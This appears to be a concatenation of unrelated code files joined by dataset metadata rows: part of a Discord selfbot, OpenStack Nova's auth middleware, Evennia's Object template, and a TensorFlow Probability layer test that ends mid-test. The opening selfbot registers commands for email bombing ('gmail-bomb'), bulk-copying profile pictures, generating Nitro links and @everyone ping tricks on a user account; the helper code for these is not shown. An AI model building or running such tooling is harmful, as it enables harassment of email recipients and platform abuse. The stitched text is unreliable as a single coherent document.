async for message in ctx.message.channel.history(limit=amount).filter(lambda m: m.author == Alucard.user).map(lambda m: m):
try:
await message.delete()
except:
pass
@Alucard.command(name='group-leaver', aliase=['leaveallgroups', 'leavegroup', 'leavegroups'])
async def _group_leaver(ctx): # b'\xfc'
await ctx.message.delete()
for channel in Alucard.private_channels:
if isinstance(channel, discord.GroupChannel):
await channel.leave()
@Alucard.command()
async def help(ctx): # b'\xfc'
await ctx.message.delete()
url = 'https://alucard-selfbot.github.io/commands'
r = requests.get(url)
if r.status_code == 200:
webbrowser.open(url)
else:
print('Page is currently under maintenance, our team will announce when the page is back online')
@Alucard.command()
async def stream(ctx, *, message): # b'\xfc'
await ctx.message.delete()
stream = discord.Streaming(
name=message,
url=stream_url,
)
await Alucard.change_presence(activity=stream)
@Alucard.command()
async def game(ctx, *, message): # b'\xfc'
await ctx.message.delete()
game = discord.Game(
name=message
)
await Alucard.change_presence(activity=game)
@Alucard.command()
async def listening(ctx, *, message): # b'\xfc'
await ctx.message.delete()
await Alucard.change_presence(
activity=discord.Activity(
type=discord.ActivityType.listening,
name=message,
))
@Alucard.command()
async def watching(ctx, *, message): # b'\xfc'
await ctx.message.delete()
await Alucard.change_presence(
activity=discord.Activity(
type=discord.ActivityType.watching,
name=message
))
@Alucard.command(aliases=['markasread', 'ack'])
async def read(ctx): # b'\xfc'
await ctx.message.delete()
for guild in Alucard.guilds:
await guild.ack()
@Alucard.command()
async def reverse(ctx, *, message): # b'\xfc'
await ctx.message.delete()
message = message[::-1]
await ctx.send(message)
@Alucard.command()
async def shrug(ctx): # b'\xfc'
await ctx.message.delete()
shrug = r'¯\_(ツ)_/¯'
await ctx.send(shrug)
@Alucard.command()
async def lenny(ctx): # b'\xfc'
await ctx.message.delete()
lenny = '( ͡° ͜ʖ ͡°)'
await ctx.send(lenny)
@Alucard.command()
async def tableflip(ctx): # b'\xfc'
await ctx.message.delete()
tableflip = '(╯°□°)╯︵ ┻━┻'
await ctx.send(tableflip)
@Alucard.command()
async def unflip(ctx): # b'\xfc'
await ctx.message.delete()
unflip = '┬─┬ ノ( ゜-゜ノ)'
await ctx.send(unflip)
@Alucard.command()
async def bold(ctx, *, message): # b'\xfc'
await ctx.message.delete()
await ctx.send('**'+message+'**')
@Alucard.command()
async def secret(ctx, *, message): # b'\xfc'
await ctx.message.delete()
await ctx.send('||'+message+'||')
@Alucard.command(name='role-hexcode', aliases=['rolecolor'])
async def _role_hexcode(ctx, *, role: discord.Role): # b'\xfc'
await ctx.message.delete()
await ctx.send(f"{role.name} : {role.color}")
@Alucard.command(name='get-hwid', aliases=['hwid', 'gethwid', 'hwidget'])
async def _get_hwid(ctx): # b'\xfc'
await ctx.message.delete()
print(f"HWID: {Fore.YELLOW}{hwid}"+Fore.RESET)
@Alucard.command()
async def empty(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send(chr(173))
@Alucard.command()
async def everyone(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send('https://@everyone@google.com')
@Alucard.command()
async def logout(ctx): # b'\xfc'
await ctx.message.delete()
await Alucard.logout()
@Alucard.command(aliases=['btc-stream', 'streambtc', 'stream-btc', 'btcstatus'])
async def btcstream(ctx): # b'\xfc'
await ctx.message.delete()
btc_status.start()
@Alucard.command(name='steal-all-pfp', aliases=['steal-all-pfps', 'stealallpfps'])
async def _steal_all_pfp(ctx): # b'\xfc'
await ctx.message.delete()
Dump(ctx)
@Alucard.command(aliases=['clearconsole', 'consoleclear'])
async def cls(ctx): # b'\xfc'
await ctx.message.delete()
Clear()
startprint()
@Alucard.command()
async def nitro(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send(Nitro())
@Alucard.command(name='gmail-bomb', aliases=['gmail-bomber', 'gmailbomb', 'email-bomber', 'emailbomber'])
async def _gmail_bomb(ctx): # b'\xfc'
await ctx.message.delete()
GmailBomber()
if __name__ == '__main__':
Init()
| 36.761555 | 244 | 0.561934 |
b356bf9974e764585ccda306a861d59e349d5e11 | 5,834 | py | Python | nova/api/auth.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | nova/api/auth.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | nova/api/auth.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Auth Middleware.
"""
from oslo.config import cfg
import webob.dec
import webob.exc
from nova import context
from nova.openstack.common.gettextutils import _
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova import wsgi
auth_opts = [
cfg.BoolOpt('api_rate_limit',
default=False,
help=('Whether to use per-user rate limiting for the api. '
'This option is only used by v2 api. Rate limiting '
'is removed from v3 api.')),
cfg.StrOpt('auth_strategy',
default='noauth',
help='The strategy to use for auth: noauth or keystone.'),
cfg.BoolOpt('use_forwarded_for',
default=False,
help='Treat X-Forwarded-For as the canonical remote address. '
'Only enable this if you have a sanitizing proxy.'),
]
CONF = cfg.CONF
CONF.register_opts(auth_opts)
LOG = logging.getLogger(__name__)
def _load_pipeline(loader, pipeline):
filters = [loader.get_filter(n) for n in pipeline[:-1]]
app = loader.get_app(pipeline[-1])
filters.reverse()
for filter in filters:
app = filter(app)
return app
def pipeline_factory(loader, global_conf, **local_conf):
"""A paste pipeline replica that keys off of auth_strategy."""
pipeline = local_conf[CONF.auth_strategy]
if not CONF.api_rate_limit:
limit_name = CONF.auth_strategy + '_nolimit'
pipeline = local_conf.get(limit_name, pipeline)
pipeline = pipeline.split()
# NOTE (Alex Xu): This is just for configuration file compatibility.
# If the configuration file still contains 'ratelimit_v3', just ignore it.
# We will remove this code at next release (J)
if 'ratelimit_v3' in pipeline:
LOG.warn(_('ratelimit_v3 is removed from v3 api.'))
pipeline.remove('ratelimit_v3')
return _load_pipeline(loader, pipeline)
def pipeline_factory_v3(loader, global_conf, **local_conf):
"""A paste pipeline replica that keys off of auth_strategy."""
return _load_pipeline(loader, local_conf[CONF.auth_strategy].split())
class InjectContext(wsgi.Middleware):
"""Add a 'nova.context' to WSGI environ."""
def __init__(self, context, *args, **kwargs):
self.context = context
super(InjectContext, self).__init__(*args, **kwargs)
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
req.environ['nova.context'] = self.context
return self.application
class NovaKeystoneContext(wsgi.Middleware):
"""Make a request context from keystone headers."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
user_id = req.headers.get('X_USER')
user_id = req.headers.get('X_USER_ID', user_id)
if user_id is None:
LOG.debug("Neither X_USER_ID nor X_USER found in request")
return webob.exc.HTTPUnauthorized()
roles = self._get_roles(req)
if 'X_TENANT_ID' in req.headers:
# This is the new header since Keystone went to ID/Name
project_id = req.headers['X_TENANT_ID']
else:
# This is for legacy compatibility
project_id = req.headers['X_TENANT']
project_name = req.headers.get('X_TENANT_NAME')
user_name = req.headers.get('X_USER_NAME')
# Get the auth token
auth_token = req.headers.get('X_AUTH_TOKEN',
req.headers.get('X_STORAGE_TOKEN'))
# Build a context, including the auth_token...
remote_address = req.remote_addr
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
service_catalog = None
if req.headers.get('X_SERVICE_CATALOG') is not None:
try:
catalog_header = req.headers.get('X_SERVICE_CATALOG')
service_catalog = jsonutils.loads(catalog_header)
except ValueError:
raise webob.exc.HTTPInternalServerError(
_('Invalid service catalog json.'))
ctx = context.RequestContext(user_id,
project_id,
user_name=user_name,
project_name=project_name,
roles=roles,
auth_token=auth_token,
remote_address=remote_address,
service_catalog=service_catalog)
req.environ['nova.context'] = ctx
return self.application
def _get_roles(self, req):
"""Get the list of roles."""
if 'X_ROLES' in req.headers:
roles = req.headers.get('X_ROLES', '')
else:
# Fallback to deprecated role header:
roles = req.headers.get('X_ROLE', '')
if roles:
LOG.warn(_("Sourcing roles from deprecated X-Role HTTP "
"header"))
return [r.strip() for r in roles.split(',')]
| 36.4625 | 79 | 0.621872 |
3fa0c7e72195424af343bd34ae1496fbd4d81586 | 8,445 | py | Python | evennia/game_template/typeclasses/objects.py | lootcrawl/evennia | a5f736ca0ff89e4f7da7d3f89a8886f1ea3698aa | [
"BSD-3-Clause"
] | null | null | null | evennia/game_template/typeclasses/objects.py | lootcrawl/evennia | a5f736ca0ff89e4f7da7d3f89a8886f1ea3698aa | [
"BSD-3-Clause"
] | null | null | null | evennia/game_template/typeclasses/objects.py | lootcrawl/evennia | a5f736ca0ff89e4f7da7d3f89a8886f1ea3698aa | [
"BSD-3-Clause"
] | null | null | null | """
Object
The Object is the "naked" base class for things in the game world.
Note that the default Character, Room and Exit does not inherit from
this Object, but from their respective default implementations in the
evennia library. If you want to use this class as a parent to change
the other types, you can do so by adding this as a multiple
inheritance.
"""
from evennia import DefaultObject
class Object(DefaultObject):
"""
This is the root typeclass object, implementing an in-game Evennia
game object, such as having a location, being able to be
manipulated or looked at, etc. If you create a new typeclass, it
must always inherit from this object (or any of the other objects
in this file, since they all actually inherit from BaseObject, as
seen in src.object.objects).
The BaseObject class implements several hooks tying into the game
engine. By re-implementing these hooks you can control the
system. You should never need to re-implement special Python
methods, such as __init__ and especially never __getattribute__ and
__setattr__ since these are used heavily by the typeclass system
of Evennia and messing with them might well break things for you.
* Base properties defined/available on all Objects
key (string) - name of object
name (string)- same as key
dbref (int, read-only) - unique #id-number. Also "id" can be used.
date_created (string) - time stamp of object creation
account (Account) - controlling account (if any, only set together with
sessid below)
sessid (int, read-only) - session id (if any, only set together with
account above). Use `sessions` handler to get the
Sessions directly.
location (Object) - current location. Is None if this is a room
home (Object) - safety start-location
has_account (bool, read-only)- will only return *connected* accounts
contents (list of Objects, read-only) - returns all objects inside this
object (including exits)
exits (list of Objects, read-only) - returns all exits from this
object, if any
destination (Object) - only set if this object is an exit.
is_superuser (bool, read-only) - True/False if this user is a superuser
* Handlers available
aliases - alias-handler: use aliases.add/remove/get() to use.
permissions - permission-handler: use permissions.add/remove() to
add/remove new perms.
locks - lock-handler: use locks.add() to add new lock strings
scripts - script-handler. Add new scripts to object with scripts.add()
cmdset - cmdset-handler. Use cmdset.add() to add new cmdsets to object
nicks - nick-handler. New nicks with nicks.add().
sessions - sessions-handler. Get Sessions connected to this
object with sessions.get()
attributes - attribute-handler. Use attributes.add/remove/get.
db - attribute-handler: Shortcut for attribute-handler. Store/retrieve
database attributes using self.db.myattr=val, val=self.db.myattr
ndb - non-persistent attribute handler: same as db but does not create
a database entry when storing data
* Helper methods (see src.objects.objects.py for full headers)
search(ostring, global_search=False, attribute_name=None,
use_nicks=False, location=None, ignore_errors=False, account=False)
execute_cmd(raw_string)
msg(text=None, **kwargs)
msg_contents(message, exclude=None, from_obj=None, **kwargs)
move_to(destination, quiet=False, emit_to_obj=None, use_destination=True)
copy(new_key=None)
delete()
is_typeclass(typeclass, exact=False)
swap_typeclass(new_typeclass, clean_attributes=False, no_default=True)
access(accessing_obj, access_type='read', default=False)
check_permstring(permstring)
* Hooks (these are class methods, so args should start with self):
basetype_setup() - only called once, used for behind-the-scenes
setup. Normally not modified.
basetype_posthook_setup() - customization in basetype, after the object
has been created; Normally not modified.
at_object_creation() - only called once, when object is first created.
Object customizations go here.
at_object_delete() - called just before deleting an object. If returning
False, deletion is aborted. Note that all objects
inside a deleted object are automatically moved
to their <home>, they don't need to be removed here.
at_init() - called whenever typeclass is cached from memory,
at least once every server restart/reload
at_cmdset_get(**kwargs) - this is called just before the command handler
requests a cmdset from this object. The kwargs are
not normally used unless the cmdset is created
dynamically (see e.g. Exits).
at_pre_puppet(account)- (account-controlled objects only) called just
before puppeting
at_post_puppet() - (account-controlled objects only) called just
after completing connection account<->object
at_pre_unpuppet() - (account-controlled objects only) called just
before un-puppeting
at_post_unpuppet(account) - (account-controlled objects only) called just
after disconnecting account<->object link
at_server_reload() - called before server is reloaded
at_server_shutdown() - called just before server is fully shut down
at_access(result, accessing_obj, access_type) - called with the result
of a lock access check on this object. Return value
does not affect check result.
at_pre_move(destination) - called just before moving object
to the destination. If returns False, move is cancelled.
announce_move_from(destination) - called in old location, just
before move, if obj.move_to() has quiet=False
announce_move_to(source_location) - called in new location, just
after move, if obj.move_to() has quiet=False
at_post_move(source_location) - always called after a move has
been successfully performed.
at_object_leave(obj, target_location) - called when an object leaves
this object in any fashion
at_object_receive(obj, source_location) - called when this object receives
another object
at_traverse(traversing_object, source_loc) - (exit-objects only)
handles all moving across the exit, including
calling the other exit hooks. Use super() to retain
the default functionality.
at_post_traverse(traversing_object, source_location) - (exit-objects only)
called just after a traversal has happened.
at_failed_traverse(traversing_object) - (exit-objects only) called if
traversal fails and property err_traverse is not defined.
at_msg_receive(self, msg, from_obj=None, **kwargs) - called when a message
(via self.msg()) is sent to this obj.
If returns false, aborts send.
at_msg_send(self, msg, to_obj=None, **kwargs) - called when this objects
sends a message to someone via self.msg().
return_appearance(looker) - describes this object. Used by "look"
command by default
at_desc(looker=None) - called by 'look' whenever the
appearance is requested.
at_get(getter) - called after object has been picked up.
Does not stop pickup.
at_drop(dropper) - called when this object has been dropped.
at_say(speaker, message) - by default, called if an object inside this
object speaks
"""
pass
| 51.809816 | 81 | 0.639905 |
cf0c13eaf7220159354fd2d3139757ba99be5317 | 42,693 | py | Python | tensorflow_probability/python/layers/distribution_layer_test.py | ykkawana/probability | 65bfd91cf6e855674da8dd9976c067f79da46e90 | [
"Apache-2.0"
] | 1 | 2018-08-27T14:37:40.000Z | 2018-08-27T14:37:40.000Z | tensorflow_probability/python/layers/distribution_layer_test.py | ykkawana/probability | 65bfd91cf6e855674da8dd9976c067f79da46e90 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/layers/distribution_layer_test.py | ykkawana/probability | 65bfd91cf6e855674da8dd9976c067f79da46e90 | [
"Apache-2.0"
] | 1 | 2018-08-27T14:37:44.000Z | 2018-08-27T14:37:44.000Z | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
# Dependency imports
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
tfk = tf.keras
tfkl = tf.keras.layers
tfb = tfp.bijectors
tfd = tfp.distributions
tfpl = tfp.layers
def _logit_avg_expit(t):
"""Computes `logit(mean(expit(t)))` in a numerically stable manner."""
log_avg_prob = (
tf.reduce_logsumexp(input_tensor=-tf.nn.softplus(-t), axis=0) -
tf.math.log(tf.cast(tf.shape(input=t)[0], t.dtype)))
return log_avg_prob - tf.math.log1p(-tf.exp(log_avg_prob))
def _vec_pad(x, value=0):
"""Prepends a column of zeros to a matrix."""
paddings = tf.concat(
[tf.zeros([tf.rank(x) - 1, 2], dtype=tf.int32), [[1, 0]]], axis=0)
return tf.pad(tensor=x, paddings=paddings, constant_values=value)
@test_util.run_all_in_graph_and_eager_modes
class EndToEndTest(tf.test.TestCase):
"""Test tfp.layers work in all three Keras APIs.
For end-to-end tests we fit a Variational Autoencoder (VAE) because this
requires chaining two Keras models, an encoder and decoder. Chaining two
models is important because making a `Distribution` as output by a Keras model
the input of another Keras model--and concurrently fitting both--is the
primary value-add of using the `tfp.layers.DistributionLambda`. Otherwise,
under many circumstances you can directly return a Distribution from a Keras
layer, as long as the Distribution base class has a tensor conversion function
registered via `tf.register_tensor_conversion_function`.
Fundamentally, there are three ways to be Keras models:
1. `tf.keras.Sequential`
2. Functional API
3. Subclass `tf.keras.Model`.
Its important to have end-to-end tests for all three, because #1 and #2 call
`__call__` and `call` differently. (#3's call pattern depends on user
implementation details, but in general ends up being either #1 or #2.)
"""
def setUp(self):
self.encoded_size = 2
self.input_shape = [2, 2, 1]
self.train_size = 100
self.test_size = 100
self.x = np.random.rand(
self.train_size, *self.input_shape).astype(np.float32)
self.x_test = np.random.rand(
self.test_size, *self.input_shape).astype(np.float32)
# TODO(b/120307671): Once this bug is resolved, use
# `activity_regularizer=tfpl.KLDivergenceRegularizer` instead of
# `KLDivergenceAddLoss`.
def test_keras_sequential_api(self):
"""Test `DistributionLambda`s are composable via Keras `Sequential` API."""
encoder_model = tfk.Sequential([
tfkl.InputLayer(input_shape=self.input_shape),
tfkl.Flatten(),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(self.encoded_size)),
tfpl.MultivariateNormalTriL(self.encoded_size),
tfpl.KLDivergenceAddLoss(
tfd.Independent(tfd.Normal(loc=[0., 0], scale=1),
reinterpreted_batch_ndims=1),
weight=self.train_size),
])
decoder_model = tfk.Sequential([
tfkl.InputLayer(input_shape=[self.encoded_size]),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.IndependentBernoulli.params_size(self.input_shape)),
tfpl.IndependentBernoulli(self.input_shape, tfd.Bernoulli.logits),
])
vae_model = tfk.Model(
inputs=encoder_model.inputs,
outputs=decoder_model(encoder_model.outputs[0]))
vae_model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(),
loss=lambda x, rv_x: -rv_x.log_prob(x),
metrics=[])
vae_model.fit(self.x, self.x,
batch_size=25,
epochs=1,
verbose=True,
validation_data=(self.x_test, self.x_test),
shuffle=True)
yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
self.assertIsInstance(yhat, tfd.Independent)
self.assertIsInstance(yhat.distribution, tfd.Bernoulli)
def test_keras_functional_api(self):
"""Test `DistributionLambda`s are composable via Keras functional API."""
encoder_model = [
tfkl.Flatten(),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(
self.encoded_size)),
tfpl.MultivariateNormalTriL(self.encoded_size),
tfpl.KLDivergenceAddLoss(
tfd.Independent(tfd.Normal(loc=[0., 0], scale=1),
reinterpreted_batch_ndims=1),
weight=self.train_size),
]
decoder_model = [
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.IndependentBernoulli.params_size(self.input_shape)),
tfpl.IndependentBernoulli(self.input_shape, tfd.Bernoulli.logits),
]
images = tfkl.Input(shape=self.input_shape)
encoded = functools.reduce(lambda x, f: f(x), encoder_model, images)
decoded = functools.reduce(lambda x, f: f(x), decoder_model, encoded)
vae_model = tfk.Model(inputs=images, outputs=decoded)
vae_model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(),
loss=lambda x, rv_x: -rv_x.log_prob(x),
metrics=[])
vae_model.fit(self.x, self.x,
batch_size=25,
epochs=1,
verbose=True,
validation_data=(self.x_test, self.x_test),
shuffle=True)
yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
self.assertIsInstance(yhat, tfd.Independent)
self.assertIsInstance(yhat.distribution, tfd.Bernoulli)
def test_keras_model_api(self):
"""Test `DistributionLambda`s are composable via Keras `Model` API."""
class Encoder(tfk.Model):
"""Encoder."""
def __init__(self, input_shape, encoded_size, train_size):
super(Encoder, self).__init__()
self._layers = [
tfkl.Flatten(),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(encoded_size)),
tfpl.MultivariateNormalTriL(encoded_size),
tfpl.KLDivergenceAddLoss(
tfd.Independent(tfd.Normal(loc=tf.zeros(encoded_size), scale=1),
reinterpreted_batch_ndims=1),
weight=train_size),
]
def call(self, inputs):
return functools.reduce(lambda x, f: f(x), self._layers, inputs)
class Decoder(tfk.Model):
"""Decoder."""
def __init__(self, output_shape):
super(Decoder, self).__init__()
self._layers = [
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.IndependentBernoulli.params_size(output_shape)),
tfpl.IndependentBernoulli(output_shape, tfd.Bernoulli.logits),
]
def call(self, inputs):
return functools.reduce(lambda x, f: f(x), self._layers, inputs)
encoder = Encoder(self.input_shape, self.encoded_size, self.train_size)
decoder = Decoder(self.input_shape)
images = tfkl.Input(shape=self.input_shape)
encoded = encoder(images)
decoded = decoder(encoded)
vae_model = tfk.Model(inputs=images, outputs=decoded)
vae_model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(),
loss=lambda x, rv_x: -rv_x.log_prob(x),
metrics=[])
vae_model.fit(self.x, self.x,
batch_size=25,
epochs=1,
validation_data=(self.x_test, self.x_test))
yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
self.assertIsInstance(yhat, tfd.Independent)
self.assertIsInstance(yhat.distribution, tfd.Bernoulli)
def test_keras_sequential_api_multiple_draws(self):
num_draws = 2
encoder_model = tfk.Sequential([
tfkl.InputLayer(input_shape=self.input_shape),
tfkl.Flatten(),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.MultivariateNormalTriL.params_size(self.encoded_size)),
tfpl.MultivariateNormalTriL(self.encoded_size,
lambda s: s.sample(num_draws, seed=42)),
tfpl.KLDivergenceAddLoss(
# TODO(b/119756336): Due to eager/graph Jacobian graph caching bug
# we add here the capability for deferred construction of the prior.
lambda: tfd.MultivariateNormalDiag(loc=tf.zeros(self.encoded_size)),
weight=self.train_size),
])
decoder_model = tfk.Sequential([
tfkl.InputLayer(input_shape=[self.encoded_size]),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.IndependentBernoulli.params_size(
self.input_shape)),
tfkl.Lambda(_logit_avg_expit), # Same as averaging the Bernoullis.
tfpl.IndependentBernoulli(self.input_shape, tfd.Bernoulli.logits),
])
vae_model = tfk.Model(
inputs=encoder_model.inputs,
outputs=decoder_model(encoder_model.outputs[0]))
vae_model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(),
loss=lambda x, rv_x: -rv_x.log_prob(x),
metrics=[])
vae_model.fit(self.x, self.x,
batch_size=25,
epochs=1,
steps_per_epoch=1, # Usually `n // batch_size`.
validation_data=(self.x_test, self.x_test))
yhat = vae_model(tf.convert_to_tensor(value=self.x_test))
self.assertIsInstance(yhat, tfd.Independent)
self.assertIsInstance(yhat.distribution, tfd.Bernoulli)
@test_util.run_all_in_graph_and_eager_modes
class KLDivergenceAddLoss(tf.test.TestCase):
def test_approx_kl(self):
# TODO(b/120320323): Enable this test in eager.
if tf.executing_eagerly(): return
event_size = 2
prior = tfd.MultivariateNormalDiag(loc=tf.zeros(event_size))
model = tfk.Sequential([
tfpl.MultivariateNormalTriL(event_size,
lambda s: s.sample(int(1e3), seed=42)),
tfpl.KLDivergenceAddLoss(prior, test_points_reduce_axis=0),
])
loc = [-1., 1.]
scale_tril = [[1.1, 0.],
[0.2, 1.3]]
actual_kl = tfd.kl_divergence(
tfd.MultivariateNormalTriL(loc, scale_tril), prior)
x = tf.concat(
[loc, tfb.ScaleTriL().inverse(scale_tril)], axis=0)[tf.newaxis]
y = model(x)
self.assertEqual(1, len(model.losses))
y = model(x)
self.assertEqual(2, len(model.losses))
[loc_, scale_tril_, actual_kl_, approx_kl_] = self.evaluate([
y.loc, y.scale.to_dense(), actual_kl, model.losses[0]])
self.assertAllClose([loc], loc_, atol=0., rtol=1e-5)
self.assertAllClose([scale_tril], scale_tril_, atol=0., rtol=1e-5)
self.assertNear(actual_kl_, approx_kl_, err=0.15)
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(),
loss=lambda x, dist: -dist.log_prob(x[0, :event_size]),
metrics=[])
model.fit(x, x,
batch_size=25,
epochs=1,
steps_per_epoch=1) # Usually `n // batch_size`.
@test_util.run_all_in_graph_and_eager_modes
class MultivariateNormalTriLTest(tf.test.TestCase):
def _check_distribution(self, t, x):
self.assertIsInstance(x, tfd.MultivariateNormalTriL)
t_back = tf.concat([
x.loc, tfb.ScaleTriL().inverse(x.scale.to_dense())], axis=-1)
self.assertAllClose(*self.evaluate([t, t_back]), atol=1e-6, rtol=1e-5)
def test_new(self):
d = 4
p = tfpl.MultivariateNormalTriL.params_size(d)
t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
x = tfpl.MultivariateNormalTriL.new(t, d, validate_args=True)
self._check_distribution(t, x)
def test_layer(self):
d = 4
p = tfpl.MultivariateNormalTriL.params_size(d)
layer = tfpl.MultivariateNormalTriL(d, tfd.Distribution.mean)
t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
x = layer(t)
self._check_distribution(t, x)
def test_doc_string(self):
# Load data.
n = int(1e3)
scale_tril = np.array([[1.6180, 0.],
[-2.7183, 3.1416]]).astype(np.float32)
scale_noise = 0.01
x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 2])
y = self.evaluate(tf.matmul(x, scale_tril) + eps)
d = y.shape[-1]
# To save testing time, let's encode the answer (i.e., _cheat_). Note: in
# writing this test we verified the correct answer is achieved with random
# initialization.
true_kernel = np.pad(scale_tril, [[0, 0], [0, 3]], 'constant')
true_bias = np.array([0, 0, np.log(scale_noise), 0, np.log(scale_noise)])
# Create model.
model = tf.keras.Sequential([
tf.keras.layers.Dense(
tfpl.MultivariateNormalTriL.params_size(d),
kernel_initializer=lambda s, **_: true_kernel,
bias_initializer=lambda s, **_: true_bias),
tfpl.MultivariateNormalTriL(d),
])
# Fit.
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(),
loss=lambda y, model: -model.log_prob(y),
metrics=[])
batch_size = 100
model.fit(x, y,
batch_size=batch_size,
epochs=1, # One ping only.
steps_per_epoch=n // batch_size)
self.assertAllClose(true_kernel, model.get_weights()[0],
atol=1e-2, rtol=1e-3)
self.assertAllClose(true_bias, model.get_weights()[1],
atol=1e-2, rtol=1e-3)
@test_util.run_all_in_graph_and_eager_modes
class OneHotCategoricalTest(tf.test.TestCase):
def _check_distribution(self, t, x):
self.assertIsInstance(x, tfd.OneHotCategorical)
[t_, x_logits_, x_probs_, mean_] = self.evaluate([
t, x.logits, x.probs, x.mean()])
self.assertAllClose(t_, x_logits_, atol=1e-6, rtol=1e-5)
self.assertAllClose(x_probs_, mean_, atol=1e-6, rtol=1e-5)
def test_new(self):
d = 4
p = tfpl.OneHotCategorical.params_size(d)
t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
x = tfpl.OneHotCategorical.new(t, d, validate_args=True)
self._check_distribution(t, x)
def test_layer(self):
d = 4
p = tfpl.OneHotCategorical.params_size(d)
layer = tfpl.OneHotCategorical(d, validate_args=True)
t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
x = layer(t)
self._check_distribution(t, x)
def test_doc_string(self):
# Load data.
n = int(1e4)
scale_noise = 0.01
x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 1])
y = self.evaluate(tfd.OneHotCategorical(
logits=_vec_pad(
0.3142 + 1.6180 * x[..., :1] - 2.7183 * x[..., 1:] + eps),
dtype=tf.float32).sample())
d = y.shape[-1]
# Create model.
model = tf.keras.Sequential([
tf.keras.layers.Dense(tfpl.OneHotCategorical.params_size(d) - 1),
tf.keras.layers.Lambda(_vec_pad),
tfpl.OneHotCategorical(d),
])
# Fit.
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.5),
loss=lambda y, model: -model.log_prob(y),
metrics=[])
batch_size = 100
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=n // batch_size,
shuffle=True)
self.assertAllClose([[1.6180], [-2.7183]], model.get_weights()[0],
atol=0, rtol=0.1)
@test_util.run_all_in_graph_and_eager_modes
class CategoricalMixtureOfOneHotCategoricalTest(tf.test.TestCase):
def _check_distribution(self, t, x):
self.assertIsInstance(x, tfd.MixtureSameFamily)
self.assertIsInstance(x.mixture_distribution, tfd.Categorical)
self.assertIsInstance(x.components_distribution, tfd.OneHotCategorical)
t_back = tf.concat([
x.mixture_distribution.logits,
tf.reshape(x.components_distribution.logits, shape=[2, 3, -1]),
], axis=-1)
[
t_,
t_back_,
x_mean_,
x_log_mean_,
sample_mean_,
] = self.evaluate([
t,
t_back,
x.mean(),
x.log_mean(),
tf.reduce_mean(input_tensor=x.sample(int(10e3), seed=42), axis=0),
])
self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)
self.assertAllClose(x_mean_, np.exp(x_log_mean_), atol=1e-6, rtol=1e-5)
self.assertAllClose(sample_mean_, x_mean_, atol=1e-3, rtol=0.1)
def test_new(self):
k = 2 # num components
d = 4 # event size
p = tfpl.CategoricalMixtureOfOneHotCategorical.params_size(d, k)
t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
x = tfpl.CategoricalMixtureOfOneHotCategorical.new(
t, d, k, validate_args=True)
self._check_distribution(t, x)
def test_layer(self):
k = 2 # num components
d = 4 # event size
p = tfpl.CategoricalMixtureOfOneHotCategorical.params_size(d, k)
layer = tfpl.CategoricalMixtureOfOneHotCategorical(
d, k, validate_args=True)
t = tfd.Normal(0, 1).sample([2, 3, p], seed=42)
x = layer(t)
self._check_distribution(t, x)
def test_doc_string(self):
# Load data.
n = int(1e3)
